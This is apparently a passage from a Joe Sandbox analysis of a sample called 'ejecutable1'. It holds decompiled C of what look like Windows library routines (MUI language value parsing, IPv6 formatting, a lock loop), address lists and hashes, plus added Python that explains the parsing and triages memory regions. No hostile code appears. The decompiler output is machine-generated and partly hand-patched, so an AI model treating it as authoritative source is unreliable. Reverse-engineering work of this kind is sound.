                                                                    						if( *_v16 != _t318) {
                                                                    							E0089E2A8(_t322,  &_v68, _t269);
                                                                    							if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    								_a4 = _a4 + 1;
                                                                    							}
                                                                    						}
                                                                    						if(_a4 == _t318) {
                                                                    							E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                    							_v40 = _t318;
                                                                    							_v20 = _t318;
                                                                    						}
                                                                    						if(_v8 != _t318) {
                                                                    							E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    						}
                                                                    						_v8 = _t318;
                                                                    						goto L30;
                                                                    					}
                                                                    				}
                                                                    				_t284 = _v24;
                                                                    				_t322 = _t284 + 4;
                                                                    				_push(_t284);
                                                                    				_v48 = _t322;
                                                                    				E008B718A(_t284);
                                                                    				_t339 = _t335 + 4;
                                                                    				if(_t322 == _t318) {
                                                                    					_v28 = _t318;
                                                                    				} else {
                                                                    					_v28 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                    				}
                                                                    				if(_v28 == _t318) {
                                                                    					_v48 = _t318;
                                                                    					goto L58;
                                                                    				} else {
                                                                    					E00892340(_v28, _v8, _v24);
                                                                    					_v16 = _v28;
                                                                    					_a4 = _t318;
                                                                    					_t288 = E008AE679(_v28, _t332);
                                                                    					_t335 = _t339 + 0x14;
                                                                    					while(1) {
                                                                    						_v12 = _t288;
                                                                    						if(_t288 == _t318) {
                                                                    							break;
                                                                    						}
                                                                    						_v12 = _v12 + 2;
                                                                    						 *_v12 = 0;
                                                                    						E0089E2A8(_v12,  &_v68, _v16);
                                                                    						if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    							_a4 = _a4 + 1;
                                                                    						}
                                                                    						_v16 = _v12;
                                                                    						_t288 = E008AE679(_v12, _t332);
                                                                    						_pop(_t322);
                                                                    					}
                                                                    					_t296 = _v16;
                                                                    					if( *_v16 != _t318) {
                                                                    						E0089E2A8(_t322,  &_v68, _t296);
                                                                    						if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
                                                                    							_a4 = _a4 + 1;
                                                                    						}
                                                                    					}
                                                                    					if(_a4 == _t318) {
                                                                    						E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                    						_v48 = _t318;
                                                                    						_v28 = _t318;
                                                                    					}
                                                                    					if(_v8 != _t318) {
                                                                    						E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                    					}
                                                                    					_v8 = _t318;
                                                                    					goto L17;
                                                                    				}
                                                                    			}
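The listing above repeats the same value-handling block three times, once each for the Allowed, Disallowed and SKU values, and the register juggling hides a short loop. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it restates that loop so its edge cases are visible (an empty token between two ';' is still handed to the check, an empty remainder after the last ';' is not, and a value with no accepted token is freed and its pointer/size pair zeroed). Fixed points taken from the listing: *[fs:0x18] is the TEB, +0x30 the PEB and +0x18 PEB.ProcessHeap, so E0089E0C6(..., 8, size) and E0089E025(...) are an allocate (8 = HEAP_ZERO_MEMORY) and a free on the process heap; 0xC000000D is STATUS_INVALID_PARAMETER and 0xC0000017 is STATUS_NO_MEMORY; the stored size is the value length plus 4 (_v24 + 4). Assumptions: the validator E008B5553 cannot be recovered from this excerpt, so accept is injected and the language-tag pattern is only a stand-in for the demo, and every function and variable name below is mine.

```python
"""Added example (not code from the sample or from the Joe Sandbox report):
a readable re-statement of the ';'-separated value handling that the
decompiled E008B8788 repeats three times, once per registry value.

Taken from the listing:
  * the value buffer is copied (E00892340); ';' is searched (E008AE679),
    overwritten with a NUL, and the token before it is handed to a check
    (E008B5553); a counter (_a4) is bumped for each accepted token;
  * after the loop only a NON-EMPTY remainder is checked (`if (*_v16 != 0)`);
  * if the counter is still zero the copy is released and the pointer/size
    pair for that value is zeroed;
  * 0xC000000D is returned for a NULL output block, 0xC0000017 when the
    heap allocation fails.
Assumption: the validator is unknown, so `accept` is injected and the
language-tag pattern below is only a stand-in.
"""
import re
from typing import Callable, List, Optional, Tuple

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_PARAMETER = 0xC000000D   # NULL output block (top of the listing)
STATUS_NO_MEMORY = 0xC0000017           # heap allocation failed (label L58)

# Stand-in validator (assumption): a loose BCP-47-looking tag such as "en-US".
_TAG = re.compile(r"^[A-Za-z]{2,3}(-[A-Za-z0-9]{2,8})*$")


def looks_like_language_tag(token: str) -> bool:
    return bool(_TAG.match(token))


def split_like_listing(value: str, accept: Callable[[str], bool]) -> Tuple[int, List[str]]:
    """Return (accepted_count, tokens) the way the decompiled loop would.

    Each ';' ends a token that is checked even when empty; the text after the
    last ';' is checked only if it is non-empty, so "a;b;" yields two tokens,
    not three.
    """
    tokens: List[str] = []
    accepted = 0
    rest = value
    while True:
        sep = rest.find(";")                        # E008AE679(buffer, ";")
        if sep < 0:
            break
        token, rest = rest[:sep], rest[sep + 1:]    # *sep = 0; continue 2 bytes later
        tokens.append(token)
        if accept(token):                           # E008B5553(&unicode_string, ...)
            accepted += 1
    if rest != "":                                  # if (*_v16 != 0)
        tokens.append(rest)
        if accept(rest):
            accepted += 1
    return accepted, tokens


def process_value(raw: Optional[str],
                  accept: Callable[[str], bool],
                  out: Optional[dict],
                  alloc_ok: bool = True) -> int:
    """Model one of the three blocks: fill `out` and return an NTSTATUS.

    `out` plays the role of the output block (_a4). `raw` is None when the
    registry value could not be read (E008B8460 < 0); the listing then just
    moves on to the next value, leaving the output fields untouched.
    """
    if out is None:
        return STATUS_INVALID_PARAMETER
    if raw is None:
        return STATUS_SUCCESS
    if not alloc_ok:        # RtlAllocateHeap(PEB->ProcessHeap, HEAP_ZERO_MEMORY, n) == NULL
        return STATUS_NO_MEMORY
    accepted, tokens = split_like_listing(raw, accept)
    if accepted == 0:       # copy freed, pointer and size zeroed
        out["tokens"], out["size"] = None, 0
        return STATUS_SUCCESS
    # The listing stores _v24 + 4 as the size; _v24 is taken here as the
    # UTF-16 byte length of the value.
    out["tokens"], out["size"] = tokens, 2 * len(raw) + 4
    return STATUS_SUCCESS


if __name__ == "__main__":
    # Constructed sample input, not data from the report.
    block: dict = {}
    status = process_value("en-US;de-DE;", looks_like_language_tag, block)
    print(hex(status), block)
```

Running the module as a script prints 0x0 and a block holding two tokens; the trailing ';' produces no third, empty token because the remainder check only fires on non-empty text, which is the detail easiest to misread in the decompiled loop.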

                                                                    Instruction addresses for the listing above, in listing order (0x00000000 marks lines with no instruction of their own):
                                                                    0x008b8788 0x008b8788 0x008b8791 0x008b8794 0x008b8798 0x008b879b 0x008b879e 0x008b87a1
                                                                    0x008b87a4 0x008b87a7 0x008b87aa 0x008b87af 0x00901ad3 0x008b8b0a 0x008b8b0d 0x008b8b13
                                                                    0x008b8b19 0x008b8b1f 0x008b8b25 0x008b8b2b 0x008b8b31 0x008b8b37 0x008b8b3d 0x008b8b46
                                                                    0x008b8b46 0x008b87c6 0x008b87d0 0x00901ae0 0x00901ae6 0x00901af8 0x00901af8 0x00901afd
                                                                    0x00901afe 0x00901b01 0x00901b06 0x00901b06 0x008b87d6 0x008b87f2 0x008b87f7 0x008b8807
                                                                    0x008b880a 0x008b880f 0x008b8810 0x008b8813 0x008b8818 0x008b8818 0x008b882c 0x008b8831
                                                                    0x008b8838 0x008b8908 0x008b8920 0x008b89f0 0x008b8a08 0x008b8af6 0x008b8af6 0x008b8af8
                                                                    0x008b8afb 0x00901beb 0x00901beb 0x008b8b04 0x00901bf8 0x00901c0e 0x00901c13 0x00901c16
                                                                    0x00901c16 0x00901bf8 0x00000000 0x008b8b04 0x008b8a0e 0x008b8a11 0x008b8a14 0x008b8a15
                                                                    0x008b8a18 0x008b8a22 0x008b8b59 0x008b8a28 0x008b8a3c 0x008b8a3c 0x008b8a42 0x00901bb0
                                                                    0x00901b11 0x00901b11 0x00000000 0x008b8a48 0x008b8a51 0x008b8a5b 0x008b8a5e 0x008b8a61
                                                                    0x008b8a69 0x008b8a69 0x008b8a6d 0x00000000 0x00000000 0x008b8a74 0x008b8a7c 0x008b8a7d
                                                                    0x008b8a91 0x008b8a93 0x008b8a93
                                                                    0x008b8a98
                                                                    0x008b8a9b
                                                                    0x008b8aa1
                                                                    0x008b8aa1
                                                                    0x008b8aa4
                                                                    0x008b8aaa
                                                                    0x008b8ab1
                                                                    0x008b8ac5
                                                                    0x008b8ac7
                                                                    0x008b8ac7
                                                                    0x008b8ac5
                                                                    0x008b8ace
                                                                    0x00901bc9
                                                                    0x00901bce
                                                                    0x00901bd2
                                                                    0x00901bd2
                                                                    0x008b8ad8
                                                                    0x008b8aeb
                                                                    0x008b8aeb
                                                                    0x008b8af0
                                                                    0x008b8af4
                                                                    0x00000000
                                                                    0x008b8af4
                                                                    0x008b8a42
                                                                    0x008b8926
                                                                    0x008b8929
                                                                    0x008b892c
                                                                    0x008b892d
                                                                    0x008b8930
                                                                    0x008b8935
                                                                    0x008b893a
                                                                    0x008b8b51
                                                                    0x008b8940
                                                                    0x008b8954
                                                                    0x008b8954
                                                                    0x008b895a
                                                                    0x00901b63
                                                                    0x00000000
                                                                    0x008b8960
                                                                    0x008b8969
                                                                    0x008b8973
                                                                    0x008b8976
                                                                    0x008b8979
                                                                    0x008b897e
                                                                    0x008b8981
                                                                    0x008b8981
                                                                    0x008b8986
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00901b6e
                                                                    0x00901b74
                                                                    0x00901b7b
                                                                    0x00901b8f
                                                                    0x00901b91
                                                                    0x00901b91
                                                                    0x00901b99
                                                                    0x00901b9c
                                                                    0x00901ba2
                                                                    0x00901ba2
                                                                    0x008b898c
                                                                    0x008b8992
                                                                    0x008b8999
                                                                    0x008b89ad
                                                                    0x00901ba8
                                                                    0x00901ba8
                                                                    0x008b89ad
                                                                    0x008b89b6
                                                                    0x008b89c8
                                                                    0x008b89cd
                                                                    0x008b89d0
                                                                    0x008b89d0
                                                                    0x008b89d6
                                                                    0x008b89e8
                                                                    0x008b89e8
                                                                    0x008b89ed
                                                                    0x00000000
                                                                    0x008b89ed
                                                                    0x008b895a
                                                                    0x008b883e
                                                                    0x008b8841
                                                                    0x008b8844
                                                                    0x008b8845
                                                                    0x008b8848
                                                                    0x008b884d
                                                                    0x008b8852
                                                                    0x008b8b49
                                                                    0x008b8858
                                                                    0x008b886c
                                                                    0x008b886c
                                                                    0x008b8872
                                                                    0x00901b0e
                                                                    0x00000000
                                                                    0x008b8878
                                                                    0x008b8881
                                                                    0x008b888b
                                                                    0x008b888e
                                                                    0x008b8891
                                                                    0x008b8896
                                                                    0x008b8899
                                                                    0x008b8899
                                                                    0x008b889e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00901b21
                                                                    0x00901b27
                                                                    0x00901b2e
                                                                    0x00901b42
                                                                    0x00901b44
                                                                    0x00901b44
                                                                    0x00901b4c
                                                                    0x00901b4f
                                                                    0x00901b55
                                                                    0x00901b55
                                                                    0x008b88a4
                                                                    0x008b88aa
                                                                    0x008b88b1
                                                                    0x008b88c5
                                                                    0x00901b5b
                                                                    0x00901b5b
                                                                    0x008b88c5
                                                                    0x008b88ce
                                                                    0x008b88e0
                                                                    0x008b88e5
                                                                    0x008b88e8
                                                                    0x008b88e8
                                                                    0x008b88ee
                                                                    0x008b8900
                                                                    0x008b8900
                                                                    0x008b8905
                                                                    0x00000000
                                                                    0x008b8905

                                                                    APIs
                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 008B8827
                                                                    • Kernel-MUI-Language-SKU, xrefs: 008B89FC
                                                                    • WindowsExcludedProcs, xrefs: 008B87C1
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 008B87E6
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 008B8914
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: _wcspbrk
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 402402107-258546922
                                                                    • Opcode ID: b673d47f998644b01179fb3313dcdf6d8fe98ebf6663683cd00129f280114689
                                                                    • Instruction ID: 7dcd3096d27955bd19329ac7af23fd289acd16431177d18791ab99e775b66378
                                                                    • Opcode Fuzzy Hash: b673d47f998644b01179fb3313dcdf6d8fe98ebf6663683cd00129f280114689
                                                                    • Instruction Fuzzy Hash: 5DF1D7B2D00209EFDF11EF99C981AEEBBB8FF08304F14446AE505E7251EB359A45DB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 38%
                                                                    			E008D13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr* _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _t71;
                                                                    				signed int _t78;
                                                                    				signed int _t86;
                                                                    				char _t90;
                                                                    				signed int _t91;
                                                                    				signed int _t96;
                                                                    				intOrPtr _t108;
                                                                    				signed int _t114;
                                                                    				void* _t115;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr* _t129;
                                                                    				void* _t130;
                                                                    				intOrPtr _t116; /* zero register used throughout; was undeclared in the decompiler output */
                                                                    				char* _t26;     /* pointer to the loop counter _v24; was undeclared in the decompiler output */
                                                                    
                                                                    				_t129 = _a4;
                                                                    				_t128 = _a8;
                                                                    				_t116 = 0;
                                                                    				_t71 = _t128 + 0x5c;
                                                                    				_v8 = 8;
                                                                    				_v20 = _t71;
                                                                    				if( *_t129 == 0) {
                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                    						goto L5;
                                                                    					} else {
                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                    						if(_t96 != 0) {
                                                                    							L38:
                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    								_t86 = L008C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                    								L36:
                                                                    								return _t128 + _t86 * 2;
                                                                    							}
                                                                    						}
                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                    						if(_t114 == 0) {
                                                                    							L33:
                                                                    							_t115 = 0x892926;
                                                                    							L35:
                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                    							_t86 = L008C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                    							goto L36;
                                                                    						}
                                                                    						if(_t114 != 0xffff) {
                                                                    							_t116 = 0;
                                                                    							goto L38;
                                                                    						}
                                                                    						if(_t114 != 0) {
                                                                    							_t115 = 0x899cac;
                                                                    							goto L35;
                                                                    						}
                                                                    						goto L33;
                                                                    					}
                                                                    				} else {
                                                                    					L5:
                                                                    					_a8 = _t116;
                                                                    					_a4 = _t116;
                                                                    					_v12 = _t116;
                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                    							_v8 = 6;
                                                                    						}
                                                                    					}
                                                                    					_t90 = _v8;
                                                                    					if(_t90 <= _t116) {
                                                                    						L11:
                                                                    						if(_a8 - _a4 <= 1) {
                                                                    							_a8 = _t116;
                                                                    							_a4 = _t116;
                                                                    						}
                                                                    						_t91 = 0;
                                                                    						if(_v8 <= _t116) {
                                                                    							L22:
                                                                    							if(_v8 < 8) {
                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                    								_t128 = _t128 + L008C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                    							}
                                                                    							return _t128;
                                                                    						} else {
                                                                    							L14:
                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                    									_push(":");
                                                                    									_push(_t71 - _t128 >> 1);
                                                                    									_push(_t128);
                                                                    									_t128 = _t128 + L008C7707() * 2;
                                                                    									_t71 = _v20;
                                                                    									_t130 = _t130 + 0xc;
                                                                    								}
                                                                    								_t78 = L008C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                    								_t130 = _t130 + 0x10;
                                                                    							} else {
                                                                    								_push(L"::");
                                                                    								_push(_t71 - _t128 >> 1);
                                                                    								_push(_t128);
                                                                    								_t78 = L008C7707();
                                                                    								_t130 = _t130 + 0xc;
                                                                    								_t91 = _a8 - 1;
                                                                    							}
                                                                    							_t91 = _t91 + 1;
                                                                    							_t128 = _t128 + _t78 * 2;
                                                                    							_t71 = _v20;
                                                                    							if(_t91 >= _v8) {
                                                                    								goto L22;
                                                                    							}
                                                                    							_t116 = 0;
                                                                    							goto L14;
                                                                    						}
                                                                    					} else {
                                                                    						_t108 = 1;
                                                                    						_v16 = _t129;
                                                                    						_v24 = _t90;
                                                                    						do {
                                                                    							if( *_v16 == _t116) {
                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                    									_a4 = _v12;
                                                                    									_a8 = _t108;
                                                                    								}
                                                                    								_t116 = 0;
                                                                    							} else {
                                                                    								_v12 = _t108;
                                                                    							}
                                                                    							_v16 = _v16 + 2;
                                                                    							_t108 = _t108 + 1;
                                                                    							_t26 =  &_v24;
                                                                    							 *_t26 = _v24 - 1;
                                                                    						} while ( *_t26 != 0);
                                                                    						goto L11;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    0x008d140c
                                                                    0x008d1411
                                                                    0x008d1431
                                                                    0x008d143a
                                                                    0x008d143c
                                                                    0x008d143f
                                                                    0x008d143f
                                                                    0x008d1442
                                                                    0x008d1447
                                                                    0x008d14a8
                                                                    0x008d14ac
                                                                    0x008fe9e2
                                                                    0x008fe9e7
                                                                    0x008fe9ec
                                                                    0x008fea05
                                                                    0x008fea05
                                                                    0x00000000
                                                                    0x008d1449
                                                                    0x00000000
                                                                    0x008d1449
                                                                    0x008d144c
                                                                    0x008d1459
                                                                    0x008d1462
                                                                    0x008d1469
                                                                    0x008d146a
                                                                    0x008d1470
                                                                    0x008d1473
                                                                    0x008d1476
                                                                    0x008d1476
                                                                    0x008d1490
                                                                    0x008d1495
                                                                    0x008d138e
                                                                    0x008d1390
                                                                    0x008d1397
                                                                    0x008d1398
                                                                    0x008d1399
                                                                    0x008d13a1
                                                                    0x008d13a4
                                                                    0x008d13a4
                                                                    0x008d1498
                                                                    0x008d149c
                                                                    0x008d149f
                                                                    0x008d14a2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008d14a4
                                                                    0x00000000
                                                                    0x008d14a4
                                                                    0x008d1413
                                                                    0x008d1415
                                                                    0x008d1416
                                                                    0x008d1419
                                                                    0x008d141c
                                                                    0x008d1422
                                                                    0x008d13b7
                                                                    0x008d13bc
                                                                    0x008d13bf
                                                                    0x008d13bf
                                                                    0x008d13c2
                                                                    0x008d1424
                                                                    0x008d1424
                                                                    0x008d1424
                                                                    0x008d1427
                                                                    0x008d142b
                                                                    0x008d142c
                                                                    0x008d142c
                                                                    0x008d142c
                                                                    0x00000000
                                                                    0x008d141c
                                                                    0x008d1411

                                                                    Memory Dump Source
• Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
• Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
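Added example, not part of the Joe Sandbox report or of the analysed sample: a small triage script over the "Memory Dump Source" descriptors listed above. It treats the fifth dotted field of an .sdmp file name as the region's page protection (0x40 is PAGE_EXECUTE_READWRITE in winnt.h) and the "Offset" value as the reconstructed image base; that field layout is an assumption, since the page does not document it. The input lines are constructed from this section, and the RVA helper shows where the decompiled function E008D0554 falls inside the image reconstructed at 0x00870000.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the descriptor lines as they appear in this report
# section, with the interactive "Download File" link text stripped.
DUMP_LINES = [
    "Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true",
    "Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp",
    "Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp",
]

# Page-protection constants from winnt.h. ASSUMPTION: the fifth dotted field
# of an .sdmp name carries the region's protection value.
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

DESCRIPTOR = re.compile(
    r"(?P<kind>Source File|Associated): "
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp"
    r"(?:, Offset: (?P<offset>[0-9A-Fa-f]+))?"
    r"(?:, based on PE: (?P<pe>true|false))?"
)


@dataclass
class DumpRegion:
    kind: str
    base: int                   # start of the dumped region
    protect: int                # page protection (assumed field)
    image_base: Optional[int]   # "Offset": base of the reconstructed PE, if any
    based_on_pe: bool


def parse_dump_line(line: str) -> Optional[DumpRegion]:
    """Parse one descriptor line; returns None for lines that do not match."""
    m = DESCRIPTOR.search(line)
    if m is None:
        return None
    return DumpRegion(
        kind=m.group("kind"),
        base=int(m.group("base"), 16),
        protect=int(m.group("protect"), 16),
        image_base=int(m.group("offset"), 16) if m.group("offset") else None,
        based_on_pe=m.group("pe") == "true",
    )


def is_executable(protect: int) -> bool:
    return protect in (PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)


def is_rwx(protect: int) -> bool:
    """Writable and executable at once: the protection to inspect first."""
    return protect == PAGE_EXECUTE_READWRITE


def rva(address: int, image_base: int) -> int:
    """Relative virtual address of a dumped code address inside the reconstructed image."""
    if address < image_base:
        raise ValueError("address lies below the image base")
    return address - image_base


def triage(lines: List[str]) -> List[dict]:
    """One finding per dumped region that deserves a closer look, in input order."""
    findings = []
    for region in filter(None, map(parse_dump_line, lines)):
        reasons = []
        if is_rwx(region.protect):
            reasons.append("PAGE_EXECUTE_READWRITE: writable and executable at the same time")
        if region.based_on_pe and region.image_base is not None:
            reasons.append(f"PE layout reconstructed with image base 0x{region.image_base:08X}")
        if reasons:
            findings.append({"base": region.base, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(DUMP_LINES):
        print(f"0x{finding['base']:08X}: " + "; ".join(finding["reasons"]))
    # The decompiled function further down, E008D0554, lives at this RVA of the
    # image reconstructed at 0x00870000.
    print(f"E008D0554 -> RVA 0x{rva(0x008D0554, 0x00870000):X}")
```

Every region in this section is RWX under the assumed field layout, which is why all eight descriptors come back as findings; the one carrying "based on PE: true" is the region the report used to rebuild a PE layout, and the RVA of E008D0554 relative to that image base is what to use when matching the decompiled function against a known-good copy of the library it resembles.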
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 79f5da4cfdc4f7dba5f1aa29745935c0559f11567ccd59f5cad425b4ba28f488
                                                                    • Instruction ID: f9805cbec8dd694a86ea06202bdcfce599d7d11d067884555c0d3af110977587
                                                                    • Opcode Fuzzy Hash: 79f5da4cfdc4f7dba5f1aa29745935c0559f11567ccd59f5cad425b4ba28f488
                                                                    • Instruction Fuzzy Hash: B2612871A00659B6CF28DF6DC8848BE7BB6FF94300718C22EE5D6C7741D678AA40CB60
Uniqueness
• Uniqueness Score: -1.00%
                                                                    C-Code - Quality: 49%
                                                                    			E008D0554(signed int _a4, char _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int* _t49;
                                                                    				signed int _t51;
                                                                    				signed int _t56;
                                                                    				signed int _t58;
                                                                    				signed int _t61;
                                                                    				signed int _t63;
                                                                    				void* _t66;
                                                                    				intOrPtr _t67;
                                                                    				signed int _t70;
                                                                    				void* _t75;
                                                                    				signed int _t81;
                                                                    				signed int _t84;
                                                                    				void* _t86;
                                                                    				signed int _t93;
                                                                    				signed int _t96;
                                                                    				intOrPtr _t105;
                                                                    				signed int _t107;
                                                                    				void* _t110;
                                                                    				signed int _t115;
                                                                    				signed int* _t119;
                                                                    				void* _t125;
                                                                    				void* _t126;
                                                                    				signed int _t128;
                                                                    				signed int _t130;
                                                                    				signed int _t138;
                                                                    				signed int _t144;
                                                                    				void* _t158;
                                                                    				void* _t159;
                                                                    				void* _t160;
                                                                    
                                                                    				_t96 = _a4;
                                                                    				_t115 =  *(_t96 + 0x28);
                                                                    				_push(_t138);
                                                                    				if(_t115 < 0) {
                                                                    					_t105 =  *[fs:0x18];
                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						__eflags = _t115 | 0xffffffff;
                                                                    						asm("lock xadd [eax], edx");
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					L6:
                                                                    					_push(_t128);
                                                                    					while(1) {
                                                                    						L7:
                                                                    						__eflags = _t115;
                                                                    						if(_t115 >= 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _a8;
                                                                    						if(_a8 == 0) {
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						} else {
                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                    							_t49 = _t96 + 0x1c;
                                                                    							_t106 = 1;
                                                                    							asm("lock xadd [edx], ecx");
                                                                    							_t115 =  *(_t96 + 0x28);
                                                                    							__eflags = _t115;
                                                                    							if(_t115 < 0) {
                                                                    								L23:
                                                                    								_t130 = 0;
                                                                    								__eflags = 0;
                                                                    								while(1) {
                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                    									asm("sbb esi, esi");
                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009701c0;
                                                                    									_push(_t144);
                                                                    									_push(0);
                                                                    									_t51 = L0088F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                    									__eflags = _t51 - 0x102;
                                                                    									if(_t51 != 0x102) {
                                                                    										break;
                                                                    									}
                                                                    									_t106 =  *(_t144 + 4);
                                                                    									_t126 =  *_t144;
                                                                    									_t86 = L008D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                    									_push(_t126);
                                                                    									_push(_t86);
